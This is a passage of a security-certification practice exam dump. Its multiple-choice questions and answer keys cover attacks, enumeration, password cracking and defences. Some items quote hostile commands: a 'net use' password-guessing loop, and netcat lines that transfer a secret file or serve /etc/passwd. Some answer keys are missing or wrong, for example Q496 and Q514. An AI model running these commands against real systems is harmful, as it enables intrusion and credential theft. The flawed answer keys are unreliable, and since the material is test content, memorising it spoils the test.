were apparent. Joseph called a friend of his at his home to help troubleshoot the problem. The Web
site appeared defaced when his friend visited using his DSL connection. So, while Smith and his
friend could see the defaced page, Joseph saw the intact Mason Insurance web site. To help make
sense of this problem, Joseph decided to access the Web site using his dial-up ISP. He
disconnected his laptop from the corporate internal network and used his modem to dial up the same
ISP used by Smith. After his modem connected, he quickly typed www.masonins.com in his browser
to reveal the following web page:

H@cker Mess@ge:

Y0u @re De@d! Fre@ks!

After seeing the defaced Web site, he disconnected his dial-up line, reconnected to the internal
network, and used Secure Shell (SSH) to log in directly to the Web server. He ran Tripwire against
the entire Web site, and determined that every system file and all the Web content on the server were
intact.

How did the attacker accomplish this hack?

A. ARP spoofing
B. SQL injection
C. DNS poisoning
D. Routing table injection

Correct Answer: C
Section: (none)
Explanation

Explanation/Reference:

QUESTION 461
Which of the following tools are used for enumeration? (Choose three.)

A. SolarWinds
B. USER2SID
C. Cheops
D. SID2USER
E. DumpSec

Correct Answer: BDE
Section: (none)
Explanation

Explanation/Reference:

QUESTION 462
What did the following commands determine?

C:\>user2sid \\earth guest
S-1-5-21-343818398-789336058-1343024091-501

C:\>sid2user 5 21 343818398 789336058 1343024091 500
Name is Joe
Domain is EARTH

A. That the Joe account has a SID of 500
B. These commands demonstrate that the guest account has NOT been disabled
C. These commands demonstrate that the guest account has been disabled
D. That the true administrator is Joe
E. Issued alone, these commands prove nothing

Correct Answer: D
Section: (none)
Explanation

Explanation/Reference:

QUESTION 463
Which definition among those given below best describes a covert channel?

A. A server program using a port that is not well known.
B. Making use of a protocol in a way it is not intended to be used.
C. It is the multiplexing taking place on a communication link.
D. It is one of the weak channels used by WEP which makes it insecure.

Correct Answer: B
Section: (none)
Explanation

Explanation/Reference:

QUESTION 464
Susan has attached to her company's network. She has managed to synchronize her boss's
sessions with that of the file server. She then intercepted his traffic destined for the server, changed
it the way she wanted to and then placed it on the server in his home directory. What kind of attack is
Susan carrying on?

A. A sniffing attack
B. A spoofing attack
C. A man in the middle attack
D. A denial of service attack

Correct Answer: C
Section: (none)
Explanation

Explanation/Reference:

QUESTION 465
Eric has discovered a fantastic package of tools named Dsniff on the Internet. He has learnt to use
these tools in his lab and is now ready for real world exploitation. He was able to effectively intercept
communications between the two entities and establish credentials with both sides of the
connections. The two remote ends of the communication never notice that Eric is relaying the
information between the two.

What would you call this attack?

A. Interceptor
B. Man-in-the-middle
C. ARP Proxy
D. Poisoning Attack

Correct Answer: B
Section: (none)
Explanation

Explanation/Reference:

QUESTION 466
Eve is spending her day scanning the library computers. She notices that Alice is using a computer
whose port 445 is active and listening. Eve uses the ENUM tool to enumerate Alice's machine. From
the command prompt, she types the following command.

for /f "tokens=1" %%a in (hackfile.txt) do net use * \\10.1.2.3\c$ /user:"Administrator" %%a

What is Eve trying to do?

A. Eve is trying to connect as a user with Administrator privileges
B. Eve is trying to enumerate all users with Administrative privileges
C. Eve is trying to carry out a password crack for user Administrator
D. Eve is trying to escalate privilege of the null user to that of Administrator

Correct Answer: C
Section: (none)
Explanation

Explanation/Reference:

QUESTION 467
Which of the following represents the initial two commands that an IRC client sends to join an IRC
network?

A. USER, NICK
B. LOGIN, NICK
C. USER, PASS
D. LOGIN, USER

Correct Answer: A
Section: (none)
Explanation

Explanation/Reference:

QUESTION 468
What does FIN in TCP flag define?

A. Used to close a TCP connection
B. Used to abort a TCP connection abruptly
C. Used to indicate the beginning of a TCP connection
D. Used to acknowledge receipt of a previous packet or transmission

Correct Answer: A
Section: (none)
Explanation

Explanation/Reference:

QUESTION 469
What port number is used by LDAP protocol?

A. 110
B. 389
C. 445
D. 464

Correct Answer: B
Section: (none)
Explanation

Explanation/Reference:

QUESTION 470
Null sessions are un-authenticated connections (not using a username or password) to an NT or
2000 system. Which TCP and UDP ports must you filter to check null sessions on your network?

A. 137 and 139
B. 137 and 443
C. 139 and 443
D. 139 and 445

Correct Answer: D
Section: (none)
Explanation

Explanation/Reference:

QUESTION 471
What sequence of packets is sent during the initial TCP three-way handshake?

A. SYN, URG, ACK
B. FIN, FIN-ACK, ACK
C. SYN, ACK, SYN-ACK
D. SYN, SYN-ACK, ACK

Correct Answer: D
Section: (none)
Explanation

Explanation/Reference:

QUESTION 472
Exhibit:

What type of attack is shown in the above diagram?

A. SSL Spoofing Attack
B. Identity Stealing Attack
C. Session Hijacking Attack
D. Man-in-the-Middle (MiTM) Attack

Correct Answer: D
Section: (none)
Explanation

Explanation/Reference:

QUESTION 473
Exhibit:

Study the following log extract and identify the attack.

A. Hexcode Attack
B. Cross Site Scripting
C. Multiple Domain Traversal Attack
D. Unicode Directory Traversal Attack

Correct Answer: D
Section: (none)
Explanation

Explanation/Reference:

QUESTION 474
Exhibit:

Based on the following extract from the log of a compromised machine, what is the hacker really
trying to steal?

A. har.txt
B. SAM file
C. wwwroot
D. Repair file

Correct Answer: B
Section: (none)
Explanation

Explanation/Reference:
QUESTION 475
Exhibit:

The following is an entry captured by a network IDS. You are assigned the task of analyzing this entry. You
notice the value 0x90, which is the most common NOOP instruction for the Intel processor. You figure that the
attacker is attempting a buffer overflow attack. You also notice "/bin/sh" in the ASCII part of the output. As an
analyst what would you conclude about the attack?

A. The buffer overflow attack has been neutralized by the IDS
B. The attacker is creating a directory on the compromised machine
C. The attacker is attempting a buffer overflow attack and has succeeded
D. The attacker is attempting an exploit that launches a command-line shell

Correct Answer: D
Section: (none)
Explanation

Explanation/Reference:

QUESTION 476
As a security consultant, what are some of the things you would recommend to a company to ensure DNS
security? Select the best answers.

A. Use the same machines for DNS and other applications
B. Harden DNS servers
C. Use split-horizon operation for DNS servers
D. Restrict Zone transfers
E. Have subnet diversity between DNS servers

Correct Answer: BCDE
Section: (none)
Explanation

Explanation/Reference:

QUESTION 477
What tool can crack Windows SMB passwords simply by listening to network traffic? Select the best answer.

A. This is not possible
B. Netbus
C. NTFSDOS
D. L0phtcrack

Correct Answer: D
Section: (none)
Explanation

Explanation/Reference:

QUESTION 478
A network admin contacts you. He is concerned that ARP spoofing or poisoning might occur on his network.
What are some things he can do to prevent it?

Select the best answers.

A. Use port security on his switches.
B. Use a tool like ARPwatch to monitor for strange ARP activity.
C. Use a firewall between all LAN segments.
D. If you have a small network, use static ARP entries.
E. Use only static IP addresses on all PCs.

Correct Answer: ABD
Section: (none)
Explanation

Explanation/Reference:

QUESTION 479
Peter, a Network Administrator, has come to you looking for advice on a tool that would help him perform
SNMP enquiries over the network. Which of these tools would do the SNMP enumeration he is looking for?

Select the best answers.

A. SNMPUtil
B. SNScan
C. SNMPScan
D. Solarwinds IP Network Browser
E. NMap

Correct Answer: ABD
Section: (none)
Explanation

Explanation/Reference:

QUESTION 480
SNMP is a protocol used to query hosts, servers and devices about performance or health status data. Hackers
have used this protocol for a long time to gather a great amount of information about remote hosts. Which of the
following features makes this possible?

A. It is susceptible to sniffing
B. It uses TCP as the underlying protocol
C. It is used by ALL devices on the market
D. It uses a community string sent as clear text

Correct Answer: AD
Section: (none)
Explanation

Explanation/Reference:

QUESTION 481
Jonathan, being a keen administrator, has followed all of the best practices he could find on securing his
Windows Server. He renamed the Administrator account to a new name that can't be easily guessed, but there
remain people who attempt to compromise his newly renamed administrator account. How can a remote
attacker decipher the name of the administrator account if it has been renamed?

A. The attacker guessed the new name
B. The attacker used the user2sid program
C. The attacker used the sid2user program
D. The attacker used NMAP with the V option

Correct Answer: C
Section: (none)
Explanation

Explanation/Reference:

QUESTION 482
SNMP is a connectionless protocol that uses UDP instead of TCP packets. (True or False)

A. True
B. False

Correct Answer: A
Section: (none)
Explanation

Explanation/Reference:

QUESTION 483
Maurine is working as a security consultant for Hinklemeir Associate. She has asked the Systems Administrator
to create a group policy that would not allow null sessions on the network. The Systems Administrator is fresh
out of college and has never heard of null sessions and does not know what they are used for. Maurine is trying
to explain to the Systems Administrator that hackers will try to create a null session when footprinting the
network.

Why would an attacker try to create a null session with a computer on a network?

A. Enumerate users and shares
B. Install a backdoor for later attacks
C. Escalate his/her privileges on the target server
D. To create a user with administrative privileges for later use

Correct Answer: A
Section: (none)
Explanation

Explanation/Reference:

QUESTION 484
If a token and 4-digit personal identification number (PIN) are used to access a computer system and the token
performs off-line checking for the correct PIN, what type of attack is possible?

A. Birthday
B. Brute force
C. Man-in-the-middle
D. Smurf

Correct Answer: B
Section: (none)
Explanation

Explanation/Reference:

QUESTION 485
Bob is doing a password assessment for one of his clients. Bob suspects that security policies are not in place.
He also suspects that weak passwords are probably the norm throughout the company he is
evaluating. Bob is familiar with password weaknesses and key loggers.

Which of the following options best represents the means that Bob can adopt to retrieve passwords from his
client's hosts and servers?

A. Hardware, Software, and Sniffing.
B. Hardware and Software Keyloggers.
C. Passwords are always best obtained using Hardware key loggers.
D. Software only, they are the most effective.

Correct Answer: A
Section: (none)
Explanation

Explanation/Reference:

QUESTION 486
Study the Snort rule given below:
From the options below, choose the exploit against which this rule applies.

A. WebDav
B. SQL Slammer
C. MS Blaster
D. MyDoom

Correct Answer: C
Section: (none)
Explanation

Explanation/Reference:

QUESTION 487
Which of the following algorithms can be used to guarantee the integrity of messages being sent, in transit, or
stored? (Choose the best answer)

A. symmetric algorithms
B. asymmetric algorithms
C. hashing algorithms
D. integrity algorithms

Correct Answer: C
Section: (none)
Explanation

Explanation/Reference:

QUESTION 488
A user on your Windows 2000 network has discovered that he can use L0phtcrack to sniff the SMB exchanges
which carry user logons. The user is plugged into a hub with 23 other systems. However, he is unable to capture
any logons though he knows that other users are logging in.
What do you think is the most likely reason behind this?

A. There is a NIDS present on that segment.
B. Kerberos is preventing it.
C. Windows logons cannot be sniffed.
D. L0phtcrack only sniffs logons to web servers.

Correct Answer: B
Section: (none)
Explanation

Explanation/Reference:

QUESTION 489
You are attempting to crack LAN Manager (LM) hashes from a Windows 2000 SAM file. You will be using an LM
brute-force hacking tool for decryption. What encryption algorithm will you be decrypting?

A. MD4
B. DES
C. SHA
D. SSL

Correct Answer: B
Section: (none)
Explanation

Explanation/Reference:

QUESTION 490
In the context of password security, a simple dictionary attack involves loading a dictionary file (a text file full of
dictionary words) into a cracking application such as L0phtCrack or John the Ripper, and running it against user
accounts located by the application. The larger the word and word-fragment selection, the more effective the
dictionary attack is. The brute force method is the most inclusive, although slow. It usually tries every possible
letter and number combination in its automated exploration.

If you were to use both brute force and dictionary methods combined to produce variations of words, what
would you call such an attack?

A. Full Blown
B. Thorough
C. Hybrid
D. BruteDics

Correct Answer: C
Section: (none)
Explanation

Explanation/Reference:

QUESTION 491
What is the algorithm used by LM for the Windows 2000 SAM?

A. MD4
B. DES
C. SHA
D. SSL

Correct Answer: B
Section: (none)
Explanation

Explanation/Reference:

QUESTION 492
E-mail scams and mail fraud are regulated by which of the following?

A. 18 U.S.C. par. 1030 Fraud and Related activity in connection with Computers
B. 18 U.S.C. par. 1029 Fraud and Related activity in connection with Access Devices
C. 18 U.S.C. par. 1362 Communication Lines, Stations, or Systems
D. 18 U.S.C. par. 2510 Wire and Electronic Communications Interception and Interception of Oral
Communication

Correct Answer: A
Section: (none)
Explanation

Explanation/Reference:

QUESTION 493
Which of the following LM hashes represent a password of less than 8 characters? (Select 2)

A. BA810DBA98995F1817306D272A9441BB
B. 44EFCE164AB921CQAAD3B435B51404EE
C. 0182BD0BD4444BF836077A718CCDF409
D. CEC52EB9C8E3455DC2265B23734E0DAC
E. B757BF5C0D87772FAAD3B435B51404EE
F. E52CAC67419A9A224A3B108F3FA6CB6D

Correct Answer: B
Section: (none)
Explanation

Explanation/Reference:

QUESTION 494
Which of the following is the primary objective of a rootkit?

A. It opens a port to provide an unauthorized service
B. It creates a buffer overflow
C. It replaces legitimate programs
D. It provides an undocumented opening in a program

Correct Answer: C
Section: (none)
Explanation

Explanation/Reference:

QUESTION 495
This kind of password cracking method uses word lists in combination with numbers and special characters:

A. Hybrid
B. Linear
C. Symmetric
D. Brute Force

Correct Answer: A
Section: (none)
Explanation

Explanation/Reference:

QUESTION 496
Exhibit

You receive an e-mail with the message displayed in the exhibit.

From this e-mail you suspect that this message was sent by some hacker, since you have been using their e-mail
services for the last 2 years and they never sent out an e-mail like this. You also observe the URL in the
message and confirm your suspicion about 340590649. You immediately enter the following at the Windows
2000 command prompt.

ping 340590649

You get a response with a valid IP address. What is the obfuscated IP address in the e-mail URL?

A. 192.34.5.9
B. 10.0.3.4
C. 203.2.4.5
D. 199.23.43.4
Correct Answer:
Section: (none)
Explanation

Explanation/Reference:

QUESTION 497
______ is a tool that can hide processes from the process list, can hide files and registry entries, and intercept keystrokes.

A. Trojan
B. RootKit
C. DoS tool
D. Scanner
E. Backdoor

Correct Answer: B
Section: (none)
Explanation

Explanation/Reference:

QUESTION 498
What is the BEST alternative if you discover that a rootkit has been installed on one of your computers?

A. Copy the system files from a known good system
B. Perform a trap and trace
C. Delete the files and try to determine the source
D. Reload from a previous backup
E. Reload from known good media

Correct Answer: E
Section: (none)
Explanation

Explanation/Reference:

QUESTION 499
What do Trinoo, TFN2k, WinTrinoo, T-Sight, and Stacheldraht have in common?

A. All are hacking tools developed by the legion of doom
B. All are tools that can be used not only by hackers, but also security personnel
C. All are DDOS tools
D. All are tools that are only effective against Windows
E. All are tools that are only effective against Linux

Correct Answer: C
Section: (none)
Explanation

Explanation/Reference:

QUESTION 500
How can you determine if an LM hash you extracted contains a password that is less than 8 characters long?

A. There is no way to tell because a hash cannot be reversed
B. The right most portion of the hash is always the same
C. The hash always starts with AB923D
D. The left most portion of the hash is always the same
E. A portion of the hash will be all 0's

Correct Answer: B
Section: (none)
Explanation

Explanation/Reference:

QUESTION 501
When discussing passwords, what is considered a brute force attack?

A. You attempt every single possibility until you exhaust all possible combinations or discover the password
B. You threaten to use the rubber hose on someone unless they reveal their password
C. You load a dictionary of words into your cracking program
D. You create hashes of a large number of words and compare it with the encrypted passwords
E. You wait until the password expires

Correct Answer: A
Section: (none)
Explanation

Explanation/Reference:

QUESTION 502
Password cracking programs reverse the hashing process to recover passwords. (True/False)

A. True
B. False

Correct Answer: B
Section: (none)
Explanation

Explanation/Reference:

QUESTION 503
While examining audit logs, you discover that people are able to telnet into the SMTP server on port 25. You
would like to block this, though you do not see any evidence of an attack or other wrongdoing.
However, you are concerned about affecting the normal functionality of the email server. From the following
options, choose how best you can achieve this objective.

A. Block port 25 at the firewall.
B. Shut off the SMTP service on the server.
C. Force all connections to use a username and password.
D. Switch from Windows Exchange to UNIX Sendmail.
E. None of the above.

Correct Answer: E
Section: (none)
Explanation

Explanation/Reference:

QUESTION 504
Windows LAN Manager (LM) hashes are known to be weak. Which of the following are known weaknesses of
LM? (Choose three)

A. Converts passwords to uppercase.
B. Hashes are sent in clear text over the network.
C. Makes use of only 32 bit encryption.
D. Effective length is 7 characters.

Correct Answer: ABD
Section: (none)
Explanation

Explanation/Reference:

QUESTION 505
You have retrieved the raw hash values from a Windows 2000 Domain Controller. Using social engineering,
you come to know that they are enforcing strong passwords. You understand that all users are required to use
passwords that are at least 8 characters in length. All passwords must also use 3 of the 4 following categories:
lower case letters, capital letters, numbers and special characters.

With your existing knowledge of users, likely user account names and the possibility that they will choose the
easiest passwords possible, what would be the fastest type of password cracking attack you can run against
these hash values and still get results?

A. Online Attack
B. Dictionary Attack
C. Brute Force Attack
D. Hybrid Attack

Correct Answer: D
Section: (none)
Explanation

Explanation/Reference:

QUESTION 506
An attacker runs the netcat tool to transfer a secret file between two hosts.
Machine A: netcat -l -p 1234 < secretfile
Machine B: netcat 192.168.3.4 > 1234

He is worried about information being sniffed on the network. How would the attacker use netcat to encrypt the
information before transmitting onto the wire?

A. Machine A: netcat -l -p -s password 1234 < testfile; Machine B: netcat <machine A IP> 1234
B. Machine A: netcat -l -e magickey -p 1234 < testfile; Machine B: netcat <machine A IP> 1234
C. Machine A: netcat -l -p 1234 < testfile -pw password; Machine B: netcat <machine A IP> 1234 -pw password
D. Use cryptcat instead of netcat

Correct Answer: D
Section: (none)
Explanation

Explanation/Reference:

QUESTION 507
You are the Security Administrator of Xtrinity, Inc. You write security policies and conduct assessments to protect
the company's network. During one of your periodic checks to see how well policy is being observed by the
employees, you discover an employee has attached a modem to his telephone line and workstation. He has
used this modem to dial in to his workstation, thereby bypassing your firewall. A security breach has occurred as
a direct result of this activity. The employee explains that he used the modem because he had to download
software for a department project.
How would you resolve this situation?

A. Reconfigure the firewall
B. Conduct a needs analysis
C. Install a network-based IDS
D. Enforce the corporate security policy

Correct Answer: D
Section: (none)
Explanation

Explanation/Reference:

QUESTION 508
What is GINA?

A. Gateway Interface Network Application
B. GUI Installed Network Application CLASS
C. Global Internet National Authority (G-USA)
D. Graphical Identification and Authentication DLL

Correct Answer: D
Section: (none)
Explanation

Explanation/Reference:

QUESTION 509
Fingerprinting an Operating System helps a cracker because:

A. It defines exactly what software you have installed
B. It opens a security-delayed window based on the port being scanned
C. It doesn't depend on the patches that have been applied to fix existing security holes
D. It informs the cracker of which vulnerabilities he may be able to exploit on your system

Correct Answer: D
Section: (none)
Explanation

Explanation/Reference:

QUESTION 510
In the context of Windows Security, what is a 'null' user?

A. A user that has no skills
B. An account that has been suspended by the admin
C. A pseudo account that has no username and password
D. A pseudo account that was created for security administration purpose

Correct Answer: C
Section: (none)
Explanation

Explanation/Reference:

QUESTION 511
What does the following command in netcat do?
nc -l -u -p 55555 < /etc/passwd

A. logs the incoming connections to the /etc/passwd file
B. loads the /etc/passwd file to the UDP port 55555
C. grabs the /etc/passwd file when connected to UDP port 55555
D. deletes the /etc/passwd file when connected to the UDP port 55555

Correct Answer: C
Section: (none)
Explanation

Explanation/Reference:

QUESTION 512
What hacking attack is challenge/response authentication used to prevent?

A. Replay attacks
B. Scanning attacks
C. Session hijacking attacks
D. Password cracking attacks

Correct Answer: A
Section: (none)
Explanation

Explanation/Reference:

QUESTION 513
What file system vulnerability does the following command take advantage of?
type c:\anyfile.exe > c:\winnt\system32\calc.exe:anyfile.exe

A. HFS
B. ADS
C. NTFS
D. Backdoor access

Correct Answer: B
Section: (none)
Explanation

Explanation/Reference:

QUESTION 514
Attackers can potentially intercept and modify unsigned SMB packets, modify the traffic and forward it so that
the server might perform undesirable actions. Alternatively, the attacker could pose as the server or client after
a legitimate authentication and gain unauthorized access to data. Which of the following is NOT a means that
can be used to minimize or protect against such an attack?

A. Timestamps
B. SMB Signing
C. File permissions
D. Sequence numbers monitoring

Correct Answer: ABD
Section: (none)
Explanation

Explanation/Reference:

QUESTION 515
Which of the following steganography utilities exploits the nature of white space and allows the user to conceal
information in these whitespaces?

A. Snow
B. Gif-It-Up
C. NiceText
D. Image Hide

Correct Answer: A
Section: (none)
Explanation

Explanation/Reference:

QUESTION 516
______ is found in all versions of NTFS and is described as the ability to fork file data into existing files without affecting
their functionality, size, or display to traditional file browsing utilities like dir or Windows Explorer.

A. Steganography
B. Merge Streams
C. NetBIOS vulnerability
D. Alternate Data Streams

Correct Answer: D
Section: (none)
Explanation

Explanation/Reference:

QUESTION 517
LM authentication is not as strong as Windows NT authentication so you may want to disable its use, because
an attacker eavesdropping on network traffic will attack the weaker protocol. A successful attack can
compromise the user's password. How do you disable LM authentication in Windows XP?

A. Stop the LM service in Windows XP
B. Disable LSASS service in Windows XP
C. Disable LM authentication in the registry
D. Download and install LMSHUT.EXE tool from Microsoft website

Correct Answer: C
Section: (none)
Explanation

Explanation/Reference:

QUESTION 518
How would you describe an attack where an attacker attempts to deliver the payload over multiple packets over
long periods of time with the purpose of defeating simple pattern matching in IDS systems without session
reconstruction? A characteristic of this attack would be a continuous stream of small packets.

A. Session Splicing
B. Session Stealing
C. Session Hijacking
D. Session Fragmentation

Correct Answer: A
Section: (none)
Explanation

Explanation/Reference:

QUESTION 519
Which of the following keyloggers cannot be detected by anti-virus or anti-spyware products?

A. Covert keylogger
B. Stealth keylogger
C. Software keylogger
D. Hardware keylogger

Correct Answer: D
Section: (none)
Explanation

Explanation/Reference:

QUESTION 520
______ is the process of converting something from one representation to the simplest form. It deals with the way in
which systems convert data from one form to another.

A. Canonicalization
B. Character Mapping
C. Character Encoding
D. UCS transformation formats

Correct Answer: A
Section: (none)
Explanation

Explanation/Reference:

QUESTION 521
You are an Administrator of a Windows server. You want to find the port number for POP3. In what file would you
find the information, and where? Select the best answer.

A. %windir%\etc\services
B. system32\drivers\etc\services
C. %windir%\system32\drivers\etc\services
D. %windir%/system32/drivers/etc/services

Correct Answer: C
Section: (none)
Explanation

Explanation/Reference:

QUESTION 522
One of your junior administrators is concerned with Windows LM hashes and password cracking. In your
discussion with them, which of the following are true statements that you would point out?

Select the best answers.

A. John the Ripper can be used to crack a variety of passwords, but one limitation is that the output doesn't
show if the password is upper or lowercase.
B. By using NTLMv1, you have implemented an effective countermeasure to password cracking.
C. SYSKEY is an effective countermeasure.
D. If a Windows LM password is 7 characters or less, the hash will be passed with the following characters, in
HEX- 00112233445566778899.
E. Enforcing Windows complex passwords is an effective countermeasure.

Correct Answer: ACE
Section: (none)
Explanation

Explanation/Reference:

QUESTION 523
In the following example, which of these is the "exploit"?

Today, Microsoft Corporation released a security notice. It detailed how a person could bring down the
Windows 2003 Server operating system, by sending malformed packets to it. They detailed how this malicious
process had been automated using basic scripting. Even worse, the new automated method for bringing down
the server has already been used to perform denial of service attacks on many large commercial websites.

Select the best answer.

A. Microsoft Corporation is the exploit.
B. The security "hole" in the product is the exploit.
C. Windows 2003 Server
D. The exploit is the hacker that would use this vulnerability.
E. The documented method of how to use the vulnerability to gain unprivileged access.

Correct Answer: E
Section: (none)
Explanation

Explanation/Reference:

QUESTION 524
Samuel is the network administrator of DataX Communications Inc. He is trying to configure his firewall to block
password brute-force attempts on his network. He enables blocking the intruder's IP address for a period of 24
hours after more than three unsuccessful attempts. He is confident that this rule will secure his network against
hackers on the Internet.

But he still receives hundreds of thousands of brute-force attempts generated from various IP addresses around
the world. After some investigation he realizes that the intruders are using a proxy somewhere else on the
Internet which has been scripted to enable the random use of various proxies on each request so as not to
get caught by the firewall rule.

Later he adds another rule to his firewall and enables a small sleep on the password attempt so that if the
password is incorrect, it takes 45 seconds to return to the user to begin another attempt. Since an intruder
may use multiple machines to brute force the password, he also throttles the number of connections that it will be
prepared to accept from a particular IP address. This action will slow the intruder's attempts.

Samuel wants to completely block hackers' brute-force attempts on his network.

What are the alternatives to defending against possible brute-force password attacks on his site?

A. Enforce a password policy and use account lockouts after three wrong logon attempts even though this
might lock out legitimate users
B. Enable the IDS to monitor the intrusion attempts and alert you by e-mail about the IP address of the intruder
so that you can block them at the firewall manually
C. Enforce a complex password policy on your network so that passwords are more difficult to brute force
D. You can't completely block the intruders' attempts if they constantly switch proxies

Correct Answer: D
Section: (none)
Explanation

Explanation/Reference:

QUESTION 525
Which of the following are well-known password-cracking programs? (Choose all that apply.)

A. L0phtcrack
B. NetCat
C. Jack the Ripper
D. Netbus
E. John the Ripper

Correct Answer: AE
Section: (none)
Explanation

Explanation/Reference:

QUESTION 526
Which type of access control is used on a router or firewall to limit network activity?

A. Mandatory
B. Discretionary
C. Rule-based
D. Role-based

Correct Answer: C
Section: (none)
Explanation

Explanation/Reference:

QUESTION 527
At a Windows Server command prompt, which command could be used to list the running services?

A. Sc query type=running
B. Sc query \\servername
C. Sc query
D. Sc config

Correct Answer: C
Section: (none)
Explanation

Explanation/Reference:

QUESTION 528
Windows file servers commonly hold sensitive files, databases, passwords and more. Which of the following
choices would be a common vulnerability that usually exposes them?

A. Cross-site scripting
B. SQL injection
C. Missing patches
D. CRLF injection

Correct Answer: C
Section: (none)
Explanation

Explanation/Reference:

QUESTION 529
While conducting a penetration test, the tester determines that there is a firewall between the tester's machine
and the target machine. The firewall is only monitoring TCP handshaking of packets at the session layer of the
OSI model. Which type of firewall is the tester trying to traverse?

A. Packet filtering firewall
B. Application-level firewall
C. Circuit-level gateway firewall
D. Stateful multilayer inspection firewall

Correct Answer: C
Section: (none)
Explanation

Explanation/Reference:

QUESTION 530
A company firewall engineer has configured a new DMZ to allow public systems to be located away from the
internal network. The engineer has three security zones set:

Untrust (Internet): Remote network = 217.77.88.0/24
DMZ (DMZ): 11.12.13.0/24
Trust (Intranet): 192.168.0.0/24

The engineer wants to configure remote desktop access from a fixed IP on the remote network to a remote
desktop server in the DMZ. Which rule would best fit this requirement?

A. Permit 217.77.88.0/24 11.12.13.0/24 RDP 3389
B. Permit 217.77.88.12 11.12.13.50 RDP 3389
C. Permit 217.77.88.12 11.12.13.0/24 RDP 3389
D. Permit 217.77.88.0/24 11.12.13.50 RDP 3389

Correct Answer: B
Section: (none)
Explanation

Explanation/Reference:

QUESTION 531
A circuit level gateway works at which of the following layers of the OSI Model?

A. Layer 5 - Application
B. Layer 4 - TCP
C. Layer 3 - Internet protocol
D. Layer 2 - Data link

Correct Answer: B
Section: (none)
Explanation

Explanation/Reference:

QUESTION 532
Which of the following is a symmetric cryptographic standard?

A. DSA
B. PKI
C. RSA
D. 3DES

Correct Answer: D
Section: (none)
Explanation

Explanation/Reference:

QUESTION 533
A computer science student needs to fill some information into a secured Adobe PDF job application that was
received from a prospective employer. Instead of requesting a new document that allowed the forms to be
completed, the student decides to write a script that pulls passwords from a list of commonly used passwords
to try against the secured PDF until the correct password is found or the list is exhausted.

Which cryptography attack is the student attempting?

A. Man-in-the-middle attack
B. Brute-force attack
C. Dictionary attack
D. Session hijacking

Correct Answer: C
Section: (none)
Explanation

Explanation/Reference:

QUESTION 534
Which property ensures that a hash function will not produce the same hashed value for two different
messages?

A. Collision resistance
B. Bit length
C. Key strength
D. Entropy

Correct Answer: A
Section: (none)
Explanation

Explanation/Reference:

QUESTION 535
How can telnet be used to fingerprint a web server?

A. telnet webserverAddress 80, then HEAD / HTTP/1.0
B. telnet webserverAddress 80, then PUT / HTTP/1.0
C. telnet webserverAddress 80, then HEAD / HTTP/2.0
D. telnet webserverAddress 80, then PUT / HTTP/2.0

Correct Answer: A
Section: (none)
Explanation

Explanation/Reference:

QUESTION 536
Low humidity in a data center can cause which of the following problems?

A. Heat
B. Corrosion
C. Static electricity
D. Airborne contamination

Correct Answer: C
Section: (none)
Explanation

Explanation/Reference:

QUESTION 537
A consultant is hired to do physical penetration testing at a large financial company. On the first day of his
assessment, the consultant goes to the company's building dressed like an electrician and waits in the lobby for
an employee to pass through the main access gate, then the consultant follows the employee behind to get into
the restricted area. Which type of attack did the consultant perform?

A. Man trap
B. Tailgating
C. Shoulder surfing
D. Social engineering

Correct Answer: B
Section: (none)
Explanation

Explanation/Reference:

QUESTION 538
When analyzing the IDS logs, the system administrator noticed an alert was logged when the external router
was accessed from the administrator's computer to update the router configuration. What type of an alert is
this?

A. False positive
B. False negative
C. True positive
D. True negative

Correct Answer: A
Section: (none)
Explanation

Explanation/Reference:

QUESTION 539
While performing data validation of web content, a security technician is required to restrict malicious input.
Which of the following processes is an efficient way of restricting malicious input?

A. Validate web content input for query strings.
B. Validate web content input with scanning tools.
C. Validate web content input for type, length, and range.
D. Validate web content input for extraneous queries.

Correct Answer: C
Section: (none)
Explanation

Explanation/Reference:

QUESTION 540
A security consultant decides to use multiple layers of anti-virus defense, such as end user desktop anti-virus
and E-mail gateway. This approach can be used to mitigate which kind of attack?

A. Forensic attack
B. ARP spoofing attack
C. Social engineering attack
D. Scanning attack

Correct Answer: C
Section: (none)
Explanation

Explanation/Reference:

QUESTION 541
Which of the following resources does NMAP need to be used as a basic vulnerability scanner covering several
vectors like SMB, HTTP and FTP?

A. Metasploit scripting engine
B. Nessus scripting engine
C. NMAP scripting engine
D. SAINT scripting engine

Correct Answer: C
Section: (none)
Explanation

Explanation/Reference:

QUESTION 542
Which of the following scanning tools is specifically designed to find potential exploits in Microsoft Windows
products?

A. Microsoft Security Baseline Analyzer
B. Retina
C. Core Impact
D. Microsoft Baseline Security Analyzer

Correct Answer: D
Section: (none)
Explanation

Explanation/Reference:

QUESTION 543
A security analyst is performing an audit on the network to determine if there are any deviations from the
security policies in place. The analyst discovers that a user from the IT department had a dial-out modem
installed. Which security policy must the security analyst check to see if dial-out modems are allowed?

A. Firewall-management policy
B. Acceptable-use policy
C. Remote-access policy
D. Permissive policy

Correct Answer: C
Section: (none)
Explanation

Explanation/Reference:

QUESTION 544
When creating a security program, which approach would be used if senior management is supporting and
enforcing the security policy?

A. A bottom-up approach
B. A top-down approach
C. A senior creation approach
D. An IT assurance approach

Correct Answer: B
Section: (none)
Explanation

Explanation/Reference:

QUESTION 545
Which of the following processes evaluates the adherence of an organization to its stated security policy?

A. Vulnerability assessment
B. Penetration testing
C. Risk assessment
D. Security auditing

Correct Answer: D
Section: (none)
Explanation

Explanation/Reference:

QUESTION 546
A security consultant is trying to bid on a large contract that involves penetration testing and reporting. The
company accepting bids wants proof of work so the consultant prints out several audits that have been
performed. Which of the following is likely to occur as a result?

A. The consultant will ask for money on the bid because of great work.
B. The consultant may expose vulnerabilities of other companies.
C. The company accepting bids will want the same type of format of testing.
D. The company accepting bids will hire the consultant because of the great work performed.

Correct Answer: B
Section: (none)
Explanation

Explanation/Reference:

QUESTION 547
Which type of scan is used on the eye to measure the layer of blood vessels?

A. Facial recognition scan
B. Retinal scan
C. Iris scan
D. Signature kinetics scan

Correct Answer: B
Section: (none)
Explanation

Explanation/Reference:

QUESTION 548
What is the main reason the use of a stored biometric is vulnerable to an attack?

A. The digital representation of the biometric might not be unique, even if the physical characteristic is unique.
B. Authentication using a stored biometric compares a copy to a copy instead of the original to a copy.
C. A stored biometric is no longer "something you are" and instead becomes "something you have".
D. A stored biometric can be stolen and used by an attacker to impersonate the individual identified by the
biometric.

Correct Answer: D
Section: (none)
Explanation

Explanation/Reference:

QUESTION 549
During a wireless penetration test, a tester detects an access point using WPA2 encryption. Which of the
following attacks should be used to obtain the key?

A. The tester must capture the WPA2 authentication handshake and then crack it.
